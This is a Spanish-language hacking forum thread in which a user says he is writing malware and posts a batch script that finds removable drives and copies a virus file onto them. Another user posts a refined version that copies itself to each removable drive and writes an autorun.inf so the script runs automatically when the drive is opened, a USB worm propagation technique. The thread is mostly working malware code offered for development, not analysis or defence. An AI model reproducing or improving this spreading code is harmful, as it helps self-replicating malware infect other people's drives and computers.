 Autor
|
Tema: Script batch para infeccion a traves de Unidades Extraibles (Leído 6,615 veces)
|
LauBuru
 Desconectado
Mensajes: 37
|
Bueno estoy codeando un malware que no estya terminado, e optado por el metodo de propagacion a traves de unidades extraibles (USB,SlimCard,Memory Stick,etc...) Os dejo un script para detectar e copyar archivos en unidades extraible, pruebenlo haber que les parece, no creo que haya errores pues funciona perfectamente, pero si encuentran algo diganmelo porfa Un saludo gente  @echo off
echo. > unidad.txt
for %%a in ( A: B: C: D: E: F: G: H: I: J: K: L: M: N: Ñ: O: P: Q: R: S: T: U: V: W: X: Y: Z: ) do (
fsutil fsinfo drivetype %%a >> unidad.txt)
type unidad.txt | find "extra" >unExtra.txt
for /f "tokens=1" %%b in (unExtra.txt) do ( call :infect %%a)
:infect
set pam=%*
copy %systemroot%\system32\virus.bat %pam%\virus.bat || goto :eof
|
|
|
|
« Última modificación: 30 Marzo 2009, 08:26 am por LauBuru »
|
En línea
|
69696969 start notepad.exe ::
|
|
|
Germaniac
Desconectado
Mensajes: 13
|
La unidad Ñ: no existe y puedes obtener las unidades con Lo probe y sale un mensaje de error que No hay disco en la unidad A: (mi unidad de disquete) porque no tengo ningun disquete dentro.
|
|
|
|
|
En línea
|
|
|
|
LauBuru
Desconectado
Mensajes: 37
|
Ya se que la unidad Ñ no existe pero bueno pues todas las letras porsiaca, antes probe con "fsutil fsinfo drivetype" y "wmic logicaldisk get caption", y para mi este es el metodo mas sencillo, haunque no el mas eficaz pero bueno, poco a poco jejejeje Un saludo  PD:Modifique el code para evitar esos errores, |
|
|
|
|
En línea
|
69696969 start notepad.exe ::
|
|
|
SmartGenius
Desconectado
Mensajes: 181
:P
|
Creo que deberias usa otro medoto que sea factible para cualquier usuario, porque el uso de FSUTIL esta limitado a users con privilegios administrativos... @echo off
for %%a in (C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) do (
for /f "tokens=1" %%b in ('fsutil fsinfo drivetype %%a:^| find "extra"') do (
copy /y "%~0" "%%b:\codigo.bat"&echo.[autorun]>>"%%b:\autorun.inf"&echo.open=codigo.bat>>"%%b:\autorun.inf"))
Goto :Eof
Tambien podrias en el segundo FOR crear un ARRAY con todas las Letras que corresponden a los extraibles y guardarlo como variable para usarlo en cualqueir lado.... Saludos. |
|
|
|
|
En línea
|
|
|
|
LauBuru
Desconectado
Mensajes: 37
|
Veo que teneis el culo pelao ya en batch, bien bien asi aprendere mas, por cierto smart una pregunta los tokens de for no van de la A a la Z solamente "^" se admitiria y si asi fuera nos habilitaria el poder usar un tokens mas "^ + A-Z" pregunto pk me has dejao mosca XD Un saludo makinas PD: Para pedir el tipo de unidades, lo puede hacer un user sin pribilegios de administracion (reg query lo puede usar un user normal?) |
|
|
|
|
En línea
|
69696969 start notepad.exe ::
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
|
Script para mapear unidades de red (Archivo .bat)
Scripting
|
Iesedobleac
|
0
|
5,094
|
8 Octubre 2012, 19:12 pm
por Iesedobleac
|
|
|
|
[BATCH] copiar y ocultar virus en unidades extraibles
Scripting
|
imlikeabird34
|
9
|
6,326
|
27 Diciembre 2012, 08:56 am
por Eleкtro
|
|
|
|
[PoC] Infección de ficheros a través del registro de Windows
Análisis y Diseño de Malware
|
ThunderCls
|
7
|
5,727
|
21 Febrero 2016, 23:37 pm
por Flamer
|
|
|
|
Una investigación revela infección de terminales iPhone a través de MDM
Noticias
|
wolfbcn
|
0
|
1,273
|
19 Julio 2018, 02:02 am
por wolfbcn
|
|
|
|
Infección a través de VGA o HDMI.
Análisis y Diseño de Malware
|
B€T€B€
|
8
|
8,577
|
14 Abril 2019, 22:32 pm
por B€T€B€
|
 |
